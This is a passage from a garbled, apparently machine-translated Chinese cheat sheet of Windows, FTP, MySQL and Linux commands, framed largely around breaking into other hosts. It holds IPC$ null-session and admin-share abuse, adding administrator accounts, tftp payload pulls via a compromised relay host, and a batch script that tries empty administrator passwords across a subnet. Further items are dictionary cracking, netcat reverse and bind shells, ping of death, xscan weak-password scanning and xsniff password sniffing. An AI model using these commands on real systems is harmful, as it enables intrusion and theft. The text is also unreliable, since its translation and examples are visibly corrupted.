當前位置:成語大全網 - 書法字典 - 關於CMD的應用

關於CMD的應用

net use \ \ IP \ ipc $““/user:““建立IPC空鏈接。

Net使用\ \ IP \ ipc $“password“/user:“用戶名“建立IPC非空鏈接。

Net使用H:\ \ IP \ C $“password“/用戶:“用戶名“直接登錄並映射到對方C:在本地是H:

Net使用h: \\ip\c$登錄後映射對方。c:對本地來說,是h;

Net use \\ip\ipc$ /del刪除ipc鏈接。

Net use h: /del刪除從另壹端到名為h的本地映射:

網絡用戶用戶名密碼/添加創建用戶。

網絡用戶來賓/活動:是激活來賓用戶。

Net用戶查看那裏有哪些用戶。

Net用戶帳戶名查看帳戶的屬性。

Net本地組管理員用戶名/add向管理員添加“用戶”以使其具有管理員權限。註意:在管理員後面加上復數s。

Net開始查看哪些服務已打開。

網絡啟動服務名稱啟動服務;(例如網絡啟動遠程登錄、網絡啟動時間表)

網絡停止服務名稱停止服務。

Net time \\目標ip檢查對方的時間。

Net time \\ Target ip /set設置本地計算機的時間以與“目標ip”主機的時間同步,並添加參數/yes以取消確認信息。

Net查看本地局域網中啟用了哪些* * *權限。

Net view \\ip查看對方局域網中啟用了哪些* * *權限。

網絡配置顯示系統網絡設置。

網絡註銷斷開* * *享受

網絡暫停服務名稱暫停服務。

Net send ip“文本消息”向對方發送消息。

網絡中使用的網絡連接類型和信息。

網絡分享查看當地* * *享受。

凈分享ipc$開放ipc$***享受。

凈份額ipc$ /del刪除ipc$***

凈份額c$ /del Delete c: * *享受。

Net用戶guest 12345登錄後,將密碼更改為12345。

Net password密碼更改系統登錄密碼。

Netstat -a查看哪些端口是打開的。經常使用netstat -an。

Netstat -n檢查端口的網絡連接,通常是netstat -an。

Netstat -v查看工作進度

netstat -p協議名稱示例:netstat -p tcq/ip查看協議的使用情況(查看tcp/ip協議的使用情況)。

Netstat -s查看所有正在使用的協議的使用情況。

Nbtstat -A ip從136到139的其中壹個ip端口是開放的,您可以檢查對方最近登錄的用戶名(用戶名在03之前)-註意:參數-A應大寫。

tracert-參數ip(或計算機名)跟蹤路由(數據包),參數:“-w number”用於設置超時間隔。

Ping ip(或域名)向另壹臺主機發送默認大小為32字節的數據。參數是“-l【space】數據包大小“;“-n次發送數據”;“-t”的意思是壹直ping。

Ping -t -l 65550 ip Ping of death(發送大於64K的文件並壹直ping會變成ping of death)。

Ipconfig(winipcfg)用於windows NT和XP(windows 95 98)查看本地ip地址,ipconfig可以使用參數“/all”顯示所有配置信息。

Tlist -t在樹行列表中顯示進程(它是系統的附加工具,默認情況下不安裝,位於安裝目錄的Support/tools文件夾中)。

將-F參數添加到kill -F進程名稱中以強制結束某個進程(它是系統的附加工具,默認情況下不會安裝,位於安裝目錄的Support/tools文件夾中)。

添加-F參數後可以刪除Del -F文件名。/AR、/AH、/AS和/AA分別表示刪除只讀、隱藏、系統和歸檔文件。/A-R、/A-H、/A-S和/A-A表示刪除只讀、隱藏、系統和歸檔文件以外的文件。例如“DEL/AR *。*“表示刪除當前目錄中的所有只讀文件,“DEL/A-S *。*“表示刪除當前目錄中除系統文件以外的所有文件。

第二點:

刪除/S /Q目錄或使用:rmdir /s /Q directory /S刪除該目錄及其下的所有子目錄和文件。同時使用參數/Q取消刪除操作,在系統確認後直接刪除。(兩個命令具有相同的效果)

移動驅動器號\路徑\存儲要移動的文件名的路徑\移動文件名後,使用參數/y取消提示確認移動目錄中存在相同文件並直接覆蓋。

fc one . txt two . txt & gt;3t.txt比較兩個文件並將差異輸出到3t.txt文件。“》”和“》》;這是壹個重定向命令

at id號打開已註冊的計劃任務。

At /delete停止所有計劃的任務,使用參數/yes,無需確認即可直接停止。

在id號/delete處停止已註冊的計劃任務。

查看所有計劃任務。

在\\ip時間程序名稱(或命令)/r在某個時間運行另壹方的程序並重新啟動計算機。

手指用戶名@主機,查看最近有哪些用戶登錄。

Telnet ip端口遠離登錄服務器,默認端口為23。

Open ip連接到IP(telnet登錄後的命令)

Telnet:在這臺機器上直接鍵入telnet將在這臺機器上輸入telnet。

復制路徑\文件名1路徑\文件名2 /y將文件1復制到指定目錄作為文件2,並在您想要覆蓋現有目錄文件的同時使用參數/y取消確認。

復制c:\srv.exe \\ip\admin$將本地c:\srv.exe復制到另壹方的admin。

cppy 1st.jpg/b+2st.txt/a 3st.jpg將2st . txt的內容隱藏到1st . jpg中以在3st.jpg生成壹個新文件。註意:2st.txt文件的頭應該空三行。參數:/b指二進制文件,/a指ASCLL文件。

copy \ \ IP \ admin $ \ svv . exe c:\ or:copy \ \ IP \ admin $ \ *。*將其他admini $ * * *使用的srv.exe文件(所有文件)復制到本地c:

Xcopy文件或目錄樹目標地址\目錄名復制文件和目錄樹,覆蓋同壹個文件而不使用參數/y提示。

Tftp -i自己的IP(當使用肉機作為跳板時使用肉機IP)登錄後獲取server.exe c:\server . exe,將“IP”的server.exe下載到目標主機C:\ server。exe參數:-i表示以二進制模式傳輸,例如傳輸EXE文件時;如果沒有添加-i,則以ASCII模式(傳輸文本文件模式)傳輸。

Tftp -i IP put c:\server.exe登錄並將本地c:\server.exe上傳到主機。

ftp ip端口用於將文件上傳到服務器或執行文件操作。默認端口是21。Bin指二進制傳輸(可執行文件入口);默認情況下,它以ASCII格式傳輸(如果是文本文件)。

路由打印顯示IP路由,主要顯示網絡地址網絡地址、子網掩碼網絡掩碼、網關地址網關地址和接口地址接口。

Arp檢查並處理ARP緩存。ARP表示名稱解析,負責將IP解析為物理MAC地址。Arp -a將顯示所有信息。

啟動程序名稱或命令/max或/min打開壹個新窗口並最大化(最小化)運行壹個程序或命令。

用於檢查cpu使用情況的內存

屬性文件名(目錄名)查看文件(目錄)的屬性。

Attrib文件名-A -R -S -H或+A +R +S +H刪除(添加)文件的存檔、只讀、系統和隱藏屬性。with+作為屬性添加。

查看文件的目錄。參數:/Q顯示文件和目錄屬於哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次訪問時間,/T:W顯示文件上次修改時間。

日期/時間/t使用該參數,即“日期/t”和“時間/T”,將僅顯示當前日期和時間,無需輸入新的日期和時間。

Set指定環境變量名稱=要分配給變量的字符設置環境變量。

Set顯示所有當前環境變量。

Set p(或其他字符)顯示當前以字符p(或其他字符)開頭的所有環境變量。

暫停暫停批處理程序並顯示:請按任意鍵繼續。....

If在批處理程序中執行條件處理(有關更多詳細信息,請參見if命令和變量)

goto標記將cmd.exe指向批處理程序中的標記行(標記必須是單獨的壹行,並以冒號開頭,例如“:start”標記)。

調用路徑\批處理文件名從批處理程序調用另壹個批處理程序(請參見call/?)

For對壹組文件中的每個文件執行特定命令(有關更多詳細信息,請參見for命令和變量)。

回聲打開或關閉打開或關閉回聲,並顯示當前回聲設置,僅顯示回聲而不顯示參數。

回聲信息在屏幕上顯示信息。

回顯信息》》;Pass.txt將“信息”保存到pass.txt文件中。

Find str“Hello“aa.txt在aa . txt文件中查找字符串Hello。

查找文件名查找文件

標題標題名稱更改CMD窗口的標題名稱。

顏色值設置cmd控制臺的前景和背景顏色;0 =黑色,1 =藍色,2 =綠色,3 =淺綠色,4 =紅色,5 =紫色,6 =黃色,7=白色,8=灰色,9=淺藍色,a =淺綠色,B=淺綠色,C=淺紅色,D=淺紫色。

提示名稱更改cmd.exe的顯示命令提示(統壹將C:\ D:\更改為:EntSky\)。

#3三:

Ver在DOS窗口中顯示版本信息。

Winver彈出窗口顯示版本信息(內存大小、系統版本、補丁版本、計算機名稱)。

Format letter /FS: type格式化磁盤,類型:FAT、FAT32、NTFS例如:Format D: /FS:NTFS。

Md目錄名稱創建目錄

替換要替換的文件的源文件目錄替換文件

Ren原始文件名新文件名重命名文件名

Tree以樹形結構顯示目錄,第壹個文件夾中的文件名將使用參數-f列出。

類型文件名顯示文本文件的內容。

更多文件名逐屏顯示輸出文件。

Doskey命令鎖定=字符

用於解鎖的Doskey命令=為DOS提供的鎖定命令(編輯命令行、調用win2k命令和創建宏)。例如:lock dir命令:doskey dir=entsky(不能使用doskey dir = dir);解鎖:doskey dir=

Taskmgr調用任務管理器

Chkdsk /F D:檢查磁盤D並顯示狀態報告;添加參數/f並修復磁盤上的錯誤。

Tlntadmn telnt服務admn,鍵入Tlntadmn,選擇3,然後選擇8以將telnet服務的默認端口23更改為任何其他端口。

退出退出cmd.exe程序或目前,使用參數/B退出當前批處理腳本而不是cmd.exe。

路徑路徑\可執行文件的文件名設置可執行文件的路徑。

Cmd啟動win2K命令解釋窗口。參數:/eff,/en關閉和打開命令擴展。見cmd/?

regedit /s註冊表文件名被導入註冊表中;參數/S是指沒有任何提示的安靜模式導入;

Regedit /e註冊表文件名導出註冊表

Cacls文件名參數顯示或修改文件訪問控制列表(ACL)-對於NTFS格式。參數:/D用戶名:設置為拒絕用戶訪問;/P用戶名:perm替換指定用戶的訪問權限;/G用戶名:perm給予指定用戶訪問權限;Perm可以是:N無,R讀,W寫,C改(寫),F完全控制;示例:cacls D:\test.txt /D pub設置D:\test.txt以拒絕pub用戶的訪問。

Cacls文件名查看文件的訪問用戶權限列表。

REM文本內容向批處理文件添加註釋

查看或更改本地網絡配置

#4四:

IIS服務命令:

Iisreset /reboot重新啟動win2k計算機(但有系統將重新啟動的提示)。

Iisreset /start或stop啟動(停止)所有Internet服務。

Iisreset /restart停止並重新啟動所有Internet服務。

Iisreset /status顯示所有Internet服務的狀態。

Iisreset /enable或disable啟用(禁用)本地系統上Internet服務的重新啟動。

Iisreset /rebootonerror啟動、停止或重新啟動Internet服務時,如果出現錯誤,它將重新啟動。

如果無法停止Internet服務,Iisreset /noforce不會強制終止Internet服務。

超時(秒)過期時,Iisreset /timeout Val未停止Internet服務。如果指定了/rebooterror參數,計算機將重新啟動。默認值為重啟20秒、停止60秒和重啟0秒。

FTP命令:(細節稍後給出)

ftp的命令行格式是:

FTP-V-D-I-N-G【主機名】-V顯示遠程服務器的所有響應信息。

-d使用調試模式。

-n限制ftp的自動登錄,即不使用。netrc文件。

-g取消全局文件名。

幫助【命令】還是?【命令】查看命令描述

Bye或quit終止主機FTP進程並退出FTP管理模式。

Pwd列出當前遠程主機目錄。

上傳或發送本地文件名【上傳到主機的文件名】將本地文件發送到遠程主機。

Get或recv【遠程主機的文件名】【下載到本地後的文件名】從遠程主機傳輸到本地主機。

mget【remote-files】從遠程主機向本地主機接收壹批文件。

Mput local-files將壹批文件從本地主機傳輸到遠程主機。

Dir或ls【remote-directory】【local-file】列出當前遠程主機目錄中的文件。如果有本地文件,則將結果寫入本地文件。

Ascii設置文件以ASCII格式發送(默認值)。

Bin或image設置文件以二進制模式發送。

每次完成文件傳輸時,Bell都會發出警報。

Cdup返回到上壹個目錄。

關閉中斷與遠程服務器的ftp會話(對應於打開)

open host【port】建立指定ftp服務器的連接,並可以指定連接端口。

刪除從遠程主機上刪除文件。

刪除壹批文件。

Mkdir directory-name在遠程主機中創建目錄。

重命名【從】【到】更改遠程主機中的文件名。

Rmdir directory-name刪除遠程主機中的目錄。

狀態顯示當前FTP狀態。

系統顯示遠程主機系統類型。

用戶用戶名【密碼】【帳戶】使用不同的用戶名再次登錄遠程主機。

open host【port】重新建立新連接。

提示交互提示模式

Macdef定義宏命令

lcd會更改當前本地主機的工作目錄,如果默認,它將轉到當前用戶的主目錄。

Chmod更改遠程主機的文件權限。

當大小寫處於啟用狀態時,由MGET命令復制的文件名將被傳輸到本地計算機,並且所有文件都將轉換為小寫字母。

Cd remote-dir進入遠程主機目錄。

Cdup進入遠程主機目錄的父目錄。

!在本地機器中執行交互式shell,exit返回ftp環境,例如!ls*。活力

第五名:

MYSQL命令:

Mysql -h主機地址-u用戶名-p密碼連接MySQL;如果MYSQL剛剛安裝,超級用戶root沒有密碼。

(例如:MySQL-h 110.110.1110-urot-p 123456)

註意:u和root可以留空,其他也可以留空)

退出退出MYSQL

Mysqladmin -u username -p舊密碼新密碼更改密碼

授予對數據庫的select權限。*到用戶名@由“密碼”標識的登錄主機;添加新用戶。(註意:與上面不同的是,下面是MYSQL環境中的所有命令,因此它們後面都有壹個分號作為命令終止符。)

顯示數據庫;顯示數據庫列表。壹開始只有兩個數據庫:mysql和test。Mysql庫很重要。它包含MYSQL系統信息。我們實際上是在更改密碼和添加新用戶時使用該庫進行操作。

使用mysql

顯示表格;顯示庫中的數據表

描述表名;顯示數據表的結構

創建數據庫庫名稱;建造圖書館

使用庫名;

創建表表名(字段設置列表);制作手表

刪除數據庫庫名稱;

Drop table表名;刪除數據庫和刪除表

從表名中刪除;清除表中的記錄

Select * from表名;在表中顯示記錄

MySQL dump-opt school & gt;School.bbb備份數據庫:(命令在DOS的\\mysql\\bin目錄下執行);註意:將數據庫school備份到文件school.bbb,這是壹個具有任意文件名的文本文件。打開它,看看妳是否會發現新的東西。

win2003系統下的新命令(實用部分):

shut down/參數關閉或重新啟動本地或遠程主機。

參數描述:/S關閉主機,/R重新啟動主機,/T在0 ~ 180秒範圍內設置延遲時間,/A取消啟動,/m//由IP指定的遠程主機。

示例:shutdown /r /t 0立即重新啟動本地主機(無延遲)

Taskill/parameter進程名稱或進程的pid終止壹個或多個任務和進程。

參數說明:/pid要終止進程的pid,可以使用tasklist命令獲取每個進程的pid,/IM要終止的進程的進程名,/F強制終止進程,/T終止指定的進程及其啟動的子進程。

任務列表顯示當前在本地和遠程主機上運行的進程、服務和服務進程的進程標識符(PID)。

參數說明:/M列出當前進程加載的dll文件,/SVC顯示每個進程對應的服務,如果沒有參數則只列出當前進程。

#6六:

Linux系統下的基本命令:區分大小寫。

Uname顯示版本信息(與win2K版本相同)

Dir顯示當前目錄文件,ls -al顯示隱藏文件(與win2K的dir相同)。

查詢當前目錄位置。

Cd cd..回到上壹個目錄,註意cd和之間有壹個空格...CD/返回根目錄。

卡特彼勒文件名查看文件內容

cat & gtAbc.txt將內容寫入文件abc.txt。

更多文件名逐頁顯示文本文件。

Cp復制文件

Mv移動文件

Rm文件名刪除文件,rm -a目錄名刪除目錄和子目錄。

Mkdir目錄名創建目錄

Rmdir刪除子目錄,並且目錄中沒有文檔。

Chmod設置文件或目錄的訪問權限。

Grep在文件中查找字符串。

差異文件比較

查找文件搜索

日期當前日期和時間。

他詢問當前與您使用同壹臺機器的人以及登錄的時間和地點。

w查詢當前計算機用戶的詳細信息。

請檢查您的帳戶名稱。

群查看某人的群。

Passwd更改密碼

歷史,檢查妳自己的命令。

Ps顯示進程狀態。

Kill停止進程。

Gcc黑客通常用它來編譯用C語言編寫的文件。

Su權限被轉換為指定的用戶。

Telnet IP telnet連接到另壹臺主機(與win2K相同),當出現bash$時,連接成功。

Ftp ftp連接到服務器(與win2K相同)。

附件:批處理命令和變量

1:for命令和變量的基本格式:

FOR/parameter % variable in(set)docommand【command _ parameters】% variable:指定壹個單字母可替換參數,如:%i,並使用:%%i指定壹個變量,並使用:%i%調用該變量,該變量區分大小寫(%i不等於%i)。

批處理壹次可以處理的變量範圍為%0-%9 * * * 10,其中%0默認用於批處理文件名,而%1是使用此批處理時輸入的第壹個值。同樣,% 2-%9是指輸入的第二個到第九個值;示例:netuse \ \ ip \ ipC $ pass/user:用戶中的IP是%1,pass是% 2,用戶是%3。

(set):使用通配符指定壹個文件或壹組文件,例如(D:\user.txt)和(1 1 254)(1-1 254)、{“(1 65438+)“(1-1 254)“說明:從254到1}

命令:指定要在第壹個文件上執行的命令,例如:net use命令;如果要執行多個命令,命令此房間添加:&;分開

Command_parameters:為特定命令指定參數或命令行開關。

IN(set):指IN(set)中的值;DO命令:指執行命令。

參數:/L表示增量形式{(set)是增量形式};/F表示連續從文件中獲取值,直到完成為止{(set)是壹個文件,例如(d:\ pass . txt)}。

用法示例:

@關閉回聲

回顯使用格式:test.bat *。*.*》test . txt

對於/L % % G in(1 1 254),請執行echo %1。% % G & gt& gt測試。& amp凈使用\ \% 1。%% g/user: administrator | find“命令成功完成“》& gt測試。txt

另存為test.bat的說明:依次嘗試為指定C類網段的254個IP建立管理員密碼為空的IPC$連接。如果成功,將IP保存在test.txt中。

/L是指增量形式(即從1-254或254-1);輸入IP的前三位數字:*。*.*是批處理的默認% 1;%%G是變量(ip的最後壹位);& amp用於分隔echo和net use命令;|是指建立ipc$,在結果中用find查看是否有“命令成功完成”的信息;%1.%%G是完整的IP地址;(1 1 254)是指起始值、增長金額和結束值。

@關閉回聲

回顯使用格式:ok.bat ip

對於(D:\user.dic)中的/F %%i,請執行smb.exe % 1% % I D:\ pass . DIC 200

另存為:ok.exe描述:輸入IP後,使用字典文件d:\pass.dic解密d:\user.dic中的用戶密碼,直到該文件中的所有值都被獲取。%%i是用戶名;%1是輸入的IP地址(默認)。

#7七:

2.2:if命令和變量的基本格式:

IF【not】error level數字命令語句如果程序最終返回等於或大於指定數字的退出代碼,則指定的條件為“真”。

示例:IF errorlevel 0命令是指當返回值為0時執行程序後的命令;IF not errorlevel 1命令意味著如果程序執行返回的最後壹個值不等於1,將執行以下命令。

0表示找到並成功執行(true);1表示未找到或未執行(假)。

IF【not】string 1 = = string 2命令語句如果指定的文本字符串匹配(即字符串1等於字符串2),將執行以下命令。

示例:“if“% 2%“=“4“goto start“表示:如果輸入的第二個變量是4,將執行以下命令(註意:調用變量時,% variable name%將添加““)。

IF【not】exist file name命令語句如果指定的文件名存在,將執行以下命令。

例如:“如果沒有nc.exe·格托恩德”的意思是:如果您沒有找到nc.exe的文件,請跳轉到“:結束”標簽。

IF【not】error level數字命令語句else命令語句or IF【not】string 1 = = string 2命令語句else命令語句or IF【not】exist文件名命令語句else命令語句plus:在else命令語句之後,是指前壹個條件不為真時else行之後的命令。註意:else必須在同壹行上才有效。當有del命令時,應該使用del命令的全部內容

(2)系統的外部命令(需要下載相關工具):

1瑞士軍刀:nc.exe

參數描述:

-h查看幫助信息

三維背景模式

-e prog程序重定向,壹旦連接,執行【危險】

isecs延遲時間間隔

-l偵聽模式,用於入站連接

-L監控模式,連接關閉後繼續監控,直到CTR+C。

-n IP地址,不是域名。

-o影片記錄了16的傳輸。

-p【space】port本地端口號

-r隨機本地和遠程端口

-t使用Telnet交互模式。

-u UDP模式

-v詳細輸出,使用-vv會更詳細。

-w數字超時延遲間隔

-z關閉輸入和輸出(當用於掃描錨點時)

基本用法:

NC-NVV 192.168.0.180連接到192 . 168 . 0 . 1主機的80端口。

Nc -l -p 80打開本機的TCP 80端口並監聽。

NC-NVV-W2-z 192.168 . 0 . 180-1024 80-192.168 . 0 . 1用於掃錨。

NC-l-p 5354-t-e c:winntsystem32cmd.exe將遠程主機的cmdshell綁定到遠程主機的TCP 5354端口。

NC-t-e c:winntsystem32cmd.exe 192.168 . 0 . 2 5354設置遠程主機的cmdshell並反向連接192.438+068.0.2的端口5354。

高級用法:

Nc -L -p 80作為蜜罐使用1:打開並不斷偵聽端口80,直到CTR+C。

nc -L -p 80》C:\log.txt作為蜜罐用2打開:並不斷監聽端口80直到CTR+C,同時將結果輸出到c: \ log.txt。

NC-L-p 80 & lt;C:\honeyport.txt作為3-1的蜜罐:打開並不斷監聽80端口,直到CTR+C,並將c:\honeyport.txt中的內容發送到管道中,這也可以起到傳輸文件的作用。

Type.exe C:\ honey port | NC-L-P 80被用作蜜罐。3-2:打開並不斷監聽80端口直到CTR+C,將c:\honeyport.txt中的內容發送到管道中,也可以起到傳輸文件的作用。

對於本機器:nc -l -p本地端口。

在另壹臺主機上:NC-e cmd.exe本地IP -p本地端口*win2K。

Nc -e /bin/sh本地IP -p本地端口*linux、unix反向連接突破對方主機的防火墻。

本機使用:nc -d -l -p本地端口

在另壹臺主機上:nc -vv本地IP本地端口》;存儲文件的路徑和名稱。將文件發送到另壹臺主機。

註意:

管道命令

& lt或》重定向命令。“<,例如:tlntadmn《Test.txt是指將test . txt的內容分配給tlntadmn命令。

@表示執行@後面的命令,但不會顯示(後臺執行);示例:@ @ dir c:\ win nt》& gt;D:\log.txt的意思是:dir在後臺執行,結果存儲在D: \ log.txt中。

& gtwith》》;“》”的區別是指:覆蓋;“& gt》;指保存到(添加到)。

例如:@ dir c:\ win nt》》;D:\log.txt和@dir c:\winnt》兩個命令d:\log.txt比較兩次:use》;& gt目的是保存所有次要結果,並使用:》只有壹個結果,因為第二個結果覆蓋了第壹個結果。

#8八:

2.掃錨工具:xscan.exe。

基本格式

xscan-host & lt;起始IP & gt【-& lt;終止IP & gt】& lt測試項目》【其他選項】掃描錨點“起始IP到結束IP”部分的所有主機信息。

xscan -file <主機列表文件名》測試項目》【其他選項】掃描錨中的所有主機信息“主機IP列表文件名”

試驗項目

-active檢測主機是否處於活動狀態。

-操作系統檢測遠程操作系統類型(通過NETBIOS和SNMP協議)

-port檢測常用服務的端口狀態。

-ftp檢測ftp弱密碼

-pub檢測FTP服務的匿名用戶的寫權限。

-pop3檢測pop 3-服務器弱密碼

-smtp檢測smtp服務器漏洞

-sql檢測SQL-Server弱密碼

-smb檢測到NT-Server弱密碼。

-iis檢測到iis編碼/解碼漏洞。

-cgi檢測cgi漏洞

-nasl加載Nessus攻擊腳本

-all檢測以上所有項目。

其他選項

-i適配器號設置網絡適配器,可以通過“-l“參數獲得。

-l顯示所有網絡適配器。

-v顯示詳細的掃描進度。

-p跳過無響應的主機。

-o跳過未檢測到開放端口的主機。

-t number of concurrent threads,number of concurrent hosts指定並發線程的最大數量和並發主機的數量,默認數量為100和10。

-日誌文件名指定掃描報告的文件名(後綴為:TXT或HTML格式的文件)。

用法示例

xscan-host 192 . 168 . 1-192 . 168 . 255 . 255-全主動害蟲檢測+092 . 599999999909096

xscan-主機192.168.1-192.168 . 255 . 255-端口-SMB-T150-O檢測192。168.255.255網段內主機的標準端口狀態,nt弱密碼用戶,最大並發線程數為150,跳過沒有開放端口的主機。

xscan-file hostlist.txt-port-CGI-t200,5-v-o檢測“hostlist . txt”文件中列出的所有主機的標準端口狀態以及CGI漏洞。最大並發線程數為200,最多同時檢測5臺主機,顯示詳細檢測進度,並跳過未檢測到開放端口的主機。

#9九:

3.命令行嗅探器:xsniff.exe。

可以捕獲局域網中FTP/SMTP/POP3/HTTP協議的密碼。

參數描述

-tcp輸出tcp數據報

-udp輸出udp數據報

-ICMP輸出ICMP數據報

-傳遞過濾器密碼信息。

-隱藏後臺運行

-host解析主機名。

-addr IP地址過濾器IP地址

-端口端口過濾器端口

-log filename將輸出保存到文件中。

ascII格式的ASC輸出。

-十六進制形式的十六進制輸出16。

用法示例

xsniff . exe-pass-hide-log pass.log在後臺運行嗅探密碼,並將密碼信息保存在pass . log文件中。

xsniff . exe-tcp-udp-ASC-ADR 192.168.1嗅探192.168.1並過濾TCP和UDP信息並以ASCII格式輸出。

4.終端服務密碼破解:tscrack.exe。

參數描述

-h顯示幫助。

-v顯示版本信息。

-s在屏幕上播放解密的能力

-b密碼錯誤時的聲音。

-t是發送多個連接(多個